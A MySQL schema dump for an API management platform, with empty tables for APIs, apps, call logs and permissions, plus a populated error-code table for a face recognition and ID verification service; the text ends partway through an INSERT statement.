-- MySQL dump 10.13  Distrib 8.0.32, for Linux (x86_64)
--
-- Host: 127.0.0.1    Database: apimngr
-- ------------------------------------------------------
-- Server version	8.0.32

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!50503 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

CREATE DATABASE IF NOT EXISTS apimngr;
USE apimngr;

--
-- Table structure for table `t_api`
--

DROP TABLE IF EXISTS `t_api`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `t_api` (
  `api_id` int NOT NULL AUTO_INCREMENT COMMENT '编号',
  `api_name` varchar(100) NOT NULL COMMENT '接口名称',
  `url` varchar(200) NOT NULL COMMENT '请求地址',
  `cgi_url` varchar(200) DEFAULT NULL,
  `api_type_id` int DEFAULT NULL,
  `call_limit` varchar(50) DEFAULT NULL COMMENT '调用量限制',
  `qps_limit` varchar(50) DEFAULT NULL COMMENT 'QPS限制',
  `status` int DEFAULT NULL COMMENT '状态 0=免费使用 1=付费开通 2=测试使用 3=VIP使用',
  `description` varchar(100) DEFAULT NULL COMMENT '描述',
  `version` varchar(30) DEFAULT NULL,
  `doc_url` varchar(100) DEFAULT NULL,
  `create_by` varchar(20) DEFAULT NULL,
  `create_time` datetime DEFAULT NULL,
  `update_time` datetime DEFAULT NULL,
  `browser_count` int NOT NULL DEFAULT '0',
  `ext_json` text,
  `apply_user_id` int DEFAULT NULL COMMENT '申请人id',
  `mobile` varchar(20) DEFAULT NULL COMMENT '联系方式',
  `apply_status` int DEFAULT NULL COMMENT '申请状态：0未审核  1已审核',
  `apply_time` datetime DEFAULT NULL COMMENT '申请时间',
  `disagree_reason` varchar(500) DEFAULT NULL,
  `is_apply` int DEFAULT NULL COMMENT '是否是申请新增：0否 1是',
  PRIMARY KEY (`api_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='接口表';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `t_api`
--

LOCK TABLES `t_api` WRITE;
/*!40000 ALTER TABLE `t_api` DISABLE KEYS */;
/*!40000 ALTER TABLE `t_api` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `t_api_auth_apply`
--

DROP TABLE IF EXISTS `t_api_auth_apply`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `t_api_auth_apply` (
  `id` int NOT NULL AUTO_INCREMENT,
  `user_id` int DEFAULT NULL COMMENT '用户ID\n',
  `api_id` int DEFAULT NULL COMMENT '接口id',
  `apply_use` varchar(500) NOT NULL COMMENT '申请用途',
  `status` int DEFAULT NULL COMMENT '审核状态:0 未审核、1 已审核',
  `apply_time` datetime DEFAULT NULL COMMENT '申请时间',
  `examine_user_id` int DEFAULT NULL COMMENT '审核用户ID\n',
  `examine_content` int DEFAULT NULL COMMENT '审核内容:0 不同意、0 已同意',
  `disagree_reason` varchar(500) DEFAULT NULL COMMENT '不通过原因',
  `examine_time` datetime DEFAULT NULL COMMENT '审核时间',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci COMMENT='接口申请权限';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `t_api_auth_apply`
--

LOCK TABLES `t_api_auth_apply` WRITE;
/*!40000 ALTER TABLE `t_api_auth_apply` DISABLE KEYS */;
/*!40000 ALTER TABLE `t_api_auth_apply` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `t_api_collect`
--

DROP TABLE IF EXISTS `t_api_collect`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `t_api_collect` (
  `id` int NOT NULL AUTO_INCREMENT,
  `user_id` int DEFAULT NULL COMMENT '用户ID\n',
  `api_id` int DEFAULT NULL COMMENT '接口id',
  `is_collect` int DEFAULT NULL COMMENT '是否收藏:1 是、0 否',
  `create_time` datetime DEFAULT NULL,
  `modify_time` datetime DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci COMMENT='接口收藏';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `t_api_collect`
--

LOCK TABLES `t_api_collect` WRITE;
/*!40000 ALTER TABLE `t_api_collect` DISABLE KEYS */;
/*!40000 ALTER TABLE `t_api_collect` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `t_api_log`
--

DROP TABLE IF EXISTS `t_api_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `t_api_log` (
  `apilog_id` int NOT NULL AUTO_INCREMENT COMMENT '主键id',
  `app_id` int DEFAULT NULL COMMENT '应用id',
  `api_id` int DEFAULT NULL COMMENT '接口id',
  `call_result` int DEFAULT NULL COMMENT '调用结果 1=成功 0=失败',
  `invoke_time` varchar(50) NOT NULL,
  `response_time` varchar(100) DEFAULT NULL COMMENT '接口返回时间',
  `img_url` varchar(500) DEFAULT NULL COMMENT '图片路径',
  `err_code` varchar(30) DEFAULT NULL COMMENT '错误码',
  `invoke_date` datetime DEFAULT NULL COMMENT '调用时间',
  `user_id` int DEFAULT NULL COMMENT '用户id',
  `user_name` varchar(100) DEFAULT NULL COMMENT '用户姓名',
  `params` varchar(2000) DEFAULT NULL,
  `province` varchar(50) DEFAULT NULL COMMENT '省份',
  PRIMARY KEY (`apilog_id`,`invoke_time`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='接口日志表';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `t_api_log`
--

LOCK TABLES `t_api_log` WRITE;
/*!40000 ALTER TABLE `t_api_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `t_api_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `t_api_log_day`
--

DROP TABLE IF EXISTS `t_api_log_day`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `t_api_log_day` (
  `user_id` int NOT NULL COMMENT '开发者id',
  `user_name` varchar(100) DEFAULT NULL COMMENT '开发者名称',
  `app_id` int NOT NULL COMMENT '应用id',
  `app_name` varchar(100) DEFAULT NULL COMMENT '应用名称',
  `api_id` int NOT NULL COMMENT '接口id',
  `api_name` varchar(255) DEFAULT NULL COMMENT '应用名称',
  `total` int DEFAULT NULL COMMENT '调用成功次数',
  `failed` int DEFAULT NULL COMMENT '调用失败次数',
  `qps` int DEFAULT NULL COMMENT 'qps峰值',
  `day` varchar(50) DEFAULT NULL COMMENT '日期'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='接口日志--日表';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `t_api_log_day`
--

LOCK TABLES `t_api_log_day` WRITE;
/*!40000 ALTER TABLE `t_api_log_day` DISABLE KEYS */;
/*!40000 ALTER TABLE `t_api_log_day` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `t_api_log_hour`
--

DROP TABLE IF EXISTS `t_api_log_hour`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `t_api_log_hour` (
  `app_id` int NOT NULL COMMENT '应用id',
  `api_id` int NOT NULL COMMENT '接口id',
  `success` int DEFAULT NULL COMMENT '成功次数',
  `failed` int DEFAULT NULL COMMENT '失败次数',
  `qps` int DEFAULT NULL COMMENT 'qps峰值',
  `day` varchar(30) DEFAULT NULL COMMENT '日期 yyyy-mm-dd hh:mm'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='接口日志--时表';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `t_api_log_hour`
--

LOCK TABLES `t_api_log_hour` WRITE;
/*!40000 ALTER TABLE `t_api_log_hour` DISABLE KEYS */;
/*!40000 ALTER TABLE `t_api_log_hour` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `t_api_log_test`
--

DROP TABLE IF EXISTS `t_api_log_test`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `t_api_log_test` (
  `apilog_id` int NOT NULL AUTO_INCREMENT,
  `app_id` int DEFAULT NULL,
  `api_id` int DEFAULT NULL,
  `call_result` int DEFAULT NULL,
  `invoke_time` bigint NOT NULL,
  `response_time` varchar(100) DEFAULT NULL,
  `img_url` varchar(500) DEFAULT NULL,
  `err_code` varchar(30) DEFAULT NULL,
  `invoke_date` datetime DEFAULT NULL,
  `user_id` int DEFAULT NULL,
  `user_name` varchar(100) DEFAULT NULL,
  `params` varchar(2000) DEFAULT NULL,
  PRIMARY KEY (`apilog_id`),
  KEY `app_id` (`app_id`) USING BTREE,
  KEY `user_id` (`user_id`) USING BTREE,
  KEY `call_result_index` (`call_result`),
  KEY `api_id_index` (`api_id`),
  KEY `err_code_index` (`err_code`),
  KEY `ind_invoke_time` (`invoke_time`),
  KEY `ind2` (`call_result`,`invoke_time`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `t_api_log_test`
--

LOCK TABLES `t_api_log_test` WRITE;
/*!40000 ALTER TABLE `t_api_log_test` DISABLE KEYS */;
/*!40000 ALTER TABLE `t_api_log_test` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `t_api_need_apply`
--

DROP TABLE IF EXISTS `t_api_need_apply`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `t_api_need_apply` (
  `id` int NOT NULL AUTO_INCREMENT,
  `user_id` int DEFAULT NULL COMMENT '用户ID\n',
  `api_id` int DEFAULT NULL COMMENT '接口id',
  `mobile` varchar(20) NOT NULL COMMENT '联系方式',
  `field_json` varchar(1000) NOT NULL COMMENT '联系方式',
  `description` varchar(500) NOT NULL COMMENT '描述',
  `status` int DEFAULT NULL COMMENT '审核状态:审核状态:0 未审核、1 已审核待开发 2已审核已完成 3审核不通过',
  `apply_time` datetime DEFAULT NULL COMMENT '申请时间',
  `examine_user_id` int DEFAULT NULL COMMENT '审核用户ID\n',
  `disagree_reason` varchar(500) DEFAULT NULL COMMENT '不通过原因',
  `examine_time` datetime DEFAULT NULL COMMENT '审核时间',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci COMMENT='接口申请开发';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `t_api_need_apply`
--

LOCK TABLES `t_api_need_apply` WRITE;
/*!40000 ALTER TABLE `t_api_need_apply` DISABLE KEYS */;
/*!40000 ALTER TABLE `t_api_need_apply` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `t_api_type`
--

DROP TABLE IF EXISTS `t_api_type`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `t_api_type` (
  `apitype_id` int NOT NULL AUTO_INCREMENT COMMENT '编号',
  `type_name` varchar(100) NOT NULL COMMENT '类型名称',
  `description` varchar(100) DEFAULT NULL COMMENT '备注',
  PRIMARY KEY (`apitype_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='接口类型表';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `t_api_type`
--

LOCK TABLES `t_api_type` WRITE;
/*!40000 ALTER TABLE `t_api_type` DISABLE KEYS */;
/*!40000 ALTER TABLE `t_api_type` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `t_api_version`
--

DROP TABLE IF EXISTS `t_api_version`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `t_api_version` (
  `id` int NOT NULL AUTO_INCREMENT,
  `api_id` int NOT NULL,
  `old_version` varchar(50) DEFAULT NULL,
  `create_time` datetime DEFAULT NULL,
  `create_by` varchar(100) DEFAULT NULL,
  `remark` varchar(500) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `t_api_version`
--

LOCK TABLES `t_api_version` WRITE;
/*!40000 ALTER TABLE `t_api_version` DISABLE KEYS */;
/*!40000 ALTER TABLE `t_api_version` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `t_app`
--

DROP TABLE IF EXISTS `t_app`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `t_app` (
  `app_id` int NOT NULL AUTO_INCREMENT COMMENT '编号',
  `name` varchar(50) NOT NULL COMMENT '应用名称',
  `user_id` int NOT NULL COMMENT '关联用户id',
  `app_type_id` int NOT NULL COMMENT '应用类型id',
  `api_key` varchar(100) NOT NULL COMMENT 'API Key',
  `secret_key` varchar(100) NOT NULL COMMENT 'Secret Key',
  `create_time` varchar(50) DEFAULT NULL COMMENT '创建时间',
  `update_time` varchar(50) DEFAULT NULL COMMENT '更新时间',
  `status` int DEFAULT NULL COMMENT '应用状态（1=正常 0=停用 2=待审核）',
  `description` varchar(100) DEFAULT NULL COMMENT '应用描述',
  `expire_date` varchar(50) DEFAULT NULL COMMENT '到期日期',
  PRIMARY KEY (`app_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='应用表';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `t_app`
--

LOCK TABLES `t_app` WRITE;
/*!40000 ALTER TABLE `t_app` DISABLE KEYS */;
/*!40000 ALTER TABLE `t_app` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `t_app_api`
--

DROP TABLE IF EXISTS `t_app_api`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `t_app_api` (
  `appapi_id` int NOT NULL AUTO_INCREMENT COMMENT '主键id',
  `app_id` int NOT NULL COMMENT '应用id',
  `api_id` int NOT NULL COMMENT '接口id',
  `status` int NOT NULL COMMENT '状态 0=待审核 1=正常使用 2=待支付 3=停用',
  `call_limit` varchar(50) DEFAULT NULL COMMENT '调用量限制',
  `qps_limit` varchar(50) DEFAULT NULL COMMENT 'QPS限制',
  `qps_apply_id` varchar(50) DEFAULT NULL COMMENT '更高QPS申请id',
  `used` varchar(50) DEFAULT NULL,
  PRIMARY KEY (`appapi_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='接口权限表';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `t_app_api`
--

LOCK TABLES `t_app_api` WRITE;
/*!40000 ALTER TABLE `t_app_api` DISABLE KEYS */;
/*!40000 ALTER TABLE `t_app_api` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `t_app_type`
--

DROP TABLE IF EXISTS `t_app_type`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `t_app_type` (
  `apptype_id` int NOT NULL AUTO_INCREMENT COMMENT '主键id',
  `type_name` varchar(100) NOT NULL COMMENT '应用类型名称',
  `description` varchar(100) DEFAULT NULL COMMENT '备注',
  PRIMARY KEY (`apptype_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='应用类型表';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `t_app_type`
--

LOCK TABLES `t_app_type` WRITE;
/*!40000 ALTER TABLE `t_app_type` DISABLE KEYS */;
/*!40000 ALTER TABLE `t_app_type` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `t_auth`
--

DROP TABLE IF EXISTS `t_auth`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `t_auth` (
  `auth_id` int NOT NULL AUTO_INCREMENT COMMENT '权限id',
  `role_id` int NOT NULL COMMENT '角色id',
  `api_id` int NOT NULL COMMENT '接口id',
  PRIMARY KEY (`auth_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `t_auth`
--

LOCK TABLES `t_auth` WRITE;
/*!40000 ALTER TABLE `t_auth` DISABLE KEYS */;
/*!40000 ALTER TABLE `t_auth` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `t_code_info`
--

DROP TABLE IF EXISTS `t_code_info`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `t_code_info` (
  `err_code` varchar(30) NOT NULL COMMENT '错误码',
  `err_detail` varchar(200) DEFAULT NULL COMMENT '错误详情',
  `err_description` varchar(200) DEFAULT NULL COMMENT '错误描述',
  `feedback` varchar(200) DEFAULT NULL COMMENT '处理意见',
  KEY `err_code_index` (`err_code`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `t_code_info`
--

LOCK TABLES `t_code_info` WRITE;
/*!40000 ALTER TABLE `t_code_info` DISABLE KEYS */;
INSERT INTO `t_code_info` VALUES ('4','Open api request limit reached','集群超限额','可直接提交工单，咨询问题类型请选择人工智能服务；'),('6','no permission to access data','没有接口权限','请确认您调用的接口已经被赋权 常见问题是有V3版本权限， 调用的是v2版本接口；'),('17','Open api daily request limit reached','每天流量超限额','可提交工单，咨询问题类型请选择人工智能服务；'),('18','QPS超限额','	Open api qps request limit reached','可直接自助购买更多QPS、联系商务接口人、或者提交工单，咨询问题类型请选择人工智能服务；'),('19','Open api total request limit reached','请求总量超限额','可提交工单，咨询问题类型请选择人工智能服务；'),('100','Invalid parameter','无效的access_token参数','token拉取失败，可以参考“Access Token获取”重新获取'),('110','Access token invalid or no longer valid','Access Token失效','token有效期为30天，注意需要定期更换，也可以每次请求都拉取新token'),('111','Access token expired','Access token过期','token有效期为30天，注意需要定期更换，也可以每次请求都拉取新token'),('222001','param[] is null','必要参数未传入','参考API说明文档，修改参数'),('222002','param[start] format error','参数格式错误','参考API说明文档，修改参数'),('222003','param[length] format error','参数格式错误','参考API说明文档，修改参数'),('222004','param[op_app_id_list] format error','参数格式错误','参考API说明文档，修改参数'),('222005','param[group_id_list] format error','参数格式错误','参考API说明文档，修改参数'),('222006','group_id format error','参数格式错误','参考API说明文档，修改参数'),('222007','uid format error','参数格式错误','参考API说明文档，修改参数'),('222008','face_id format error','参数格式错误','参考API说明文档，修改参数'),('222009','quality_conf format error','参数格式错误','参考API说明文档，修改参数'),('222010','user_info format error','参数格式错误','参考API说明文档，修改参数'),('222011','param[uid_list] format error','参数格式错误','参考API说明文档，修改参数'),('222012','param[op_app_id] format error','参数格式错误','参考API说明文档，修改参数'),('222013','参数格式错误','param[image] format error','参考API说明文档，修改参数'),('222014','param[app_id] format error','参数格式错误','参考API说明文档，修改参数'),('222015','param[image_type] format error','参数格式错误','参考API说明文档，修改参数'),('222016','param[max_face_num] format error','参数格式错误','参考API说明文档，修改参数'),('222017','param[face_field] format error','参数格式错误','参考API说明文档，修改参数'),('222018','param[user_id] format error','参数格式错误','参考API说明文档，修改参数'),('222019','param[quality_control] format error','参数格式错误','参考API说明文档，修改参数'),('222207','uid format error','参数错误','参考API说明，修改参数'),('222020','param[liveness_control] format error','参数格式错误','参考API说明文档，修改参数'),('223114','face is fuzzy','人脸模糊','人脸图片模糊， 前端页面可以提示 用户拍摄时不要晃动手机'),('222021','param[max_user_num] format error','参数格式错误','参考API说明文档，修改参数'),('222022','param[id_card_number] format error','参数格式错误','参考API说明文档，修改参数'),('222023','param[name] format error','参数格式错误','参考API说明文档，修改参数'),('222024','param[face_type] format error','参数格式错误','参考API说明文档，修改参数'),('222025','param[face_token] format error','参数格式错误','参考API说明文档，修改参数'),('222026','param[max_star_num] format error','参数格式错误','参考API说明文档，修改参数'),('222027','code length param error','验证码长度错误 (最小值大于最大值)','参考API说明文档，修改参数'),('222028','param[min_code_length] format error','参数格式错误','参考API说明文档，修改参数'),('222029','param[max_code_length] format error','参数格式错误','参考API说明文档，修改参数'),('222030','param[match_threshold] format error','参数格式错误','参考API说明文档，修改参数'),('222200','request body should be json format','该接口需使用 application/json的 格式进行请求','请修改接口格式为： application/json'),('222201','network not available','服务端请求失败','重新尝试'),('222202----验证','pic not has face','图片中没有人脸','检查图片质量'),('222203','image check fail	','无法解析人脸','检查图片质量'),('222204','image_url_download_fail','从图片的url下载 图片失败','请确认url可公网访问'),('222205','network not availablel','服务端请求失败','重新尝试'),('222206','rtse service return fail','服务端请求失败','重新尝试'),('222207--验证','match user is not found','未找到匹配的用户','请确认人脸库中 是否存在此用户'),('223103','user is not exist','找不到该用户','请确认您操作的 用户已创建成功'),('223115','face light is not good','人脸光照不好','提示用户到光线适宜的地方拍摄'),('223121','left eye is occlusion','质量检测未通过 左眼 遮挡程度过高','提示用户请勿遮挡左眼'),('223122','	right eye is occlusion','质量检测未通过 右眼 遮挡程度过高','提示用户请勿遮挡右眼'),('223123','left cheek is occlusion','质量检测未通过 左脸 遮挡程度过高','提示用户请勿遮挡左脸颊'),('223124','right cheek is occlusion','质量检测未通过 右脸 遮挡程度过高','提示用户请勿遮挡右脸颊'),('222208','the number of image is incorrect','图片的数量错误','多张图片请使用 json格式传输'),('222209','face token not exist','face token不存在','请确认您操作的 人脸已创建成功； 若face_token未注册到 人脸库则有效期只有1小时 注册人脸库的 face_token永久有效'),('222210','the number of user\'s faces is beyond the limit','人脸库中用户下的人脸数目超过限制','当前每个用户下限制人脸数目最大20张'),('222300','add face fail','人脸图片添加失败','重新尝试'),('222301','get face fail','获取人脸图片失败','请重新尝试， 如果持续出现此类错误， 请提交工单'),('222302','system error','服务端请求失败','重新尝试'),('222303','get face fail','获取人脸图片失败','请重新尝试， 如果持续出现此类错误，请提交工单'),('223100','group is not exist','操作的用户组不存在','请确认您操作的 用户组已创建成功'),('223101','group is already exist','该用户组已存在','请不要重复创建用户组'),('223102','user is already exist','该用户已存在','请不要重复创建用户'),('223103--验证','user is not exist','找不到该用户','请确认您操作的 用户已创建成功'),('223104','group_list is too large','group_list包含组 数量过多','请按照文档提示 设置group_list参数'),('223105','face is already exist','该人脸已存在','请不要重复添加人脸'),('223106','face is not exist','该人脸不存在','请确认您操作的 人脸已创建成功； 若face_token未注册到 人脸库则有效期只有1小时， 注册人脸库的 face_token永久有效'),('223110','uid_list is too large','uid_list包含数量过多','请按照文档提示 设置user_list参数'),('223111','dst group is not exist','目标用户组不存在','请确认您操作的 用户组已创建成功'),('223112','quality_conf format error','quality_conf格式不正确','请按照文档提示设置 quality_conf参数'),('223113','face is covered','人脸有被遮挡','提示用户请勿遮挡面部'),('223114--验证','face is fuzzy','人脸模糊','人脸图片模糊， 前端页面可以提示 用户拍摄时不要晃动手机'),('223116','incomplete face','人脸不完整','提示用户请勿遮挡面部'),('223117','app_list is too large','app_list包含app数量 过多','请按照文档提示设置 app_list参数'),('223118','quality control error','质量控制项错误','请按照文档提示设置 质量控制参数'),('223119','liveness control item error','活体控制项错误','请按照文档提示设置 活体控制参数'),('223120','liveness check fail','活体检测未通过','此次活体检测结果为非活体'),('223121--验证','left eye is occlusion','质量检测未通过 左眼 遮挡程度过高','提示用户请勿遮挡左眼'),('223122--验证','right eye is occlusion','质量检测未通过 右眼 遮挡程度过高','提示用户请勿遮挡右眼'),('223123--验证','left cheek is occlusion','质量检测未通过 左脸 遮挡程度过高','提示用户请勿遮挡左脸颊'),('223124--验证','right cheek is occlusion','质量检测未通过 右脸 遮挡程度过高','提示用户请勿遮挡右脸颊'),('223125','chin contour is occlusion','质量检测未通过 下巴遮挡程度过高','提示用户请勿遮挡下巴'),('223126','nose is occlusion','质量检测未通过 鼻子遮挡程度过高','提示用户请勿遮挡鼻子'),('223127','mouth is occlusion','质量检测未通过 嘴巴 遮挡程度过高','提示用户请勿遮挡嘴巴'),('222901','system busy','参数校验初始化失败','请重新尝试， 若尝试多次无效， 请提交工单咨询'),('222902','system busy','参数校验初始化失败','请重新尝试， 若尝试多次无效， 请提交工单咨询'),('222903','system busy','参数校验初始化失败','请重新尝试， 若尝试多次无效， 请提交工单咨询'),('222904','system busy','参数校验初始化失败','请重新尝试， 若尝试多次无效， 请提交工单咨询'),('222905','system busy','接口初始化失败','请重新尝试， 若尝试多次无效， 请提交工单咨询'),('222906','system busy','接口初始化失败','请重新尝试， 若尝试多次无效， 请提交工单咨询'),('222907','system busy','缓存处理失败','请重新尝试， 若尝试多次无效， 请提交工单咨询'),('222908','system busy','缓存处理失败','请重新尝试， 若尝试多次无效， 请提交工单咨询'),('222909','system busy','缓存处理失败','请重新尝试， 若尝试多次无效， 请提交工单咨询'),('222910','system busy','数据存储处理失败','请重新尝试， 若尝试多次无效， 请提交工单咨询'),('222911','system busy','数据存储处理失败','请重新尝试， 若尝试多次无效， 请提交工单咨询'),('222912','system busy','数据存储处理失败','请重新尝试， 若尝试多次无效， 请提交工单咨询'),('222913','system busy','接口初始化失败','请重新尝试， 若尝试多次无效， 请提交工单咨询'),('222914','system busy','接口初始化失败','请重新尝试， 若尝试多次无效， 请提交工单咨询'),('222915','system busy','后端服务连接失败','请重新尝试， 若尝试多次无效， 请提交工单咨询'),('222916','system busy','后端服务连接失败','请重新尝试， 若尝试多次无效， 请提交工单咨询'),('222304','image size is too large','图片尺寸太大','请确保图片尺寸在1920x1080以下下'),('223128','group was deleting','正在清理该用户组的数据','请等该用户组清理完毕后再对 该组进行操作'),('222361','system busy','公安服务连接失败','请重新尝试， 若尝试多次无效， 请提交工单咨询'),('222046','param[template_type] format error','参数格式错误','请参考接口文档修改'),('222101','param[merge_degree] format error','参数格式错误','请参考API说明文档，修改参数'),('222102','param[face_location] format error','参数格式错误','参考API说明文档，修改参数'),('222307','image illegal, reason: porn','图片非法 鉴黄未通过','请重新上传合法的图片'),('222308','image illegal, reason: sensitive person','图片非法 含有政治敏感人物','请重新上传合法的图片'),('222211','template image quality reject','人脸融合失败 模板图质量不合格','请检查模板图是否符合 人脸融合文档中的质量要求'),('222212','merge face fail','人脸融合失败','请更换素材后重新尝试， 如果持续出现此类错误，请提交工单'),('223129','face not forward','人脸未面向正前方 （人脸的角度信息大于30度）','请使用面向正前方的人脸图片'),('22350','police picture is none or low quality','公安网图片不存在或 质量过低','此用户的信息没有 被公安数据覆盖到， 请将此次身份验证 转到人工进行处理'),('222351','id number and name not match or id number not exist','身份证号与姓名不匹配或该 身份证号不存在','可能身份证号码或 姓名填写错误， 请用户再次确认。 可能为作弊用户， 请增加审批环节'),('222352','name format error','身份证名字格式错误','姓名格式错误， 请确认用户姓名 是否输入正确'),('222353','id number format error','身份证号码格式错误','身份证格式错误， 请用户确认身份证 号码是否输入正确'),('222354','id number not exist','公安库里不存在此身份证号','对于公安数据缺失， 建议开设人工反馈 渠道，进行人工认证处理'),('222355','police picture not exist','身份证号码正确，公安库里没有 对应的照片','对于公安数据缺失， 建议开设人工反馈 渠道，进行人工认证处理'),('222356','person picture is low quality','验证的人脸图片质量不符合要求','确认图片上的 人脸是否清晰, 不能有多张人脸, 图片大小不能超过600KB'),('222360','invalid name or id number','身份证号码或名字非法 （公安网校 验不通过）','可能身份证号码或 姓名填写错误， 请用户再次确认。 可能为作弊用户， 请增加审批环节'),('222361--验证','network not available','公安服务连接失败','请重新尝试， 若尝试多次无效， 请提交工单咨询'),('216600','id number format error','输入身份证格式错误','请检查后重新输入'),('216601','id number and name not match','身份证号和名字匹配失败','请检查后重新输入'),('216430','rtse/face service error','rtse/face 服务异常','请重新尝试'),('216431','voice service error','语音识别服务异常','请重新尝试'),('216432','video service call fail','视频解析服务调用失败','请重新尝试'),('216433','video service error','视频解析服务发生错误','请重新尝试'),('216434','liveness check fail','活体检测失败','请重新尝试'),('216500','code digit error','验证码位数错误','验证码错误， 请增加一层验证环节'),('216501','not found face','没有找到人脸','请查看上传视频是否包含人脸'),('216502','session lapse','当前会话已失效','请重新获取语音验证码'),('216505','redis connect error','redis连接失败','请重新尝试'),('216506','redis operation error','redis操作失败','请重新尝试'),('216507','found many faces','视频中有多张人脸','请重新录制视频'),('216508','not found video info','没有找到视频信息','请参考文档修改视频格式'),('216509','voice can not identify','视频中的声音无法识别 （声音过低或者有杂 音导致无法识别）','请重新录制视频'),('216908','视频中人脸质量较差 (返回信息中包含具体原因)','视频中人脸质量过低 (返回的错误信息会包含 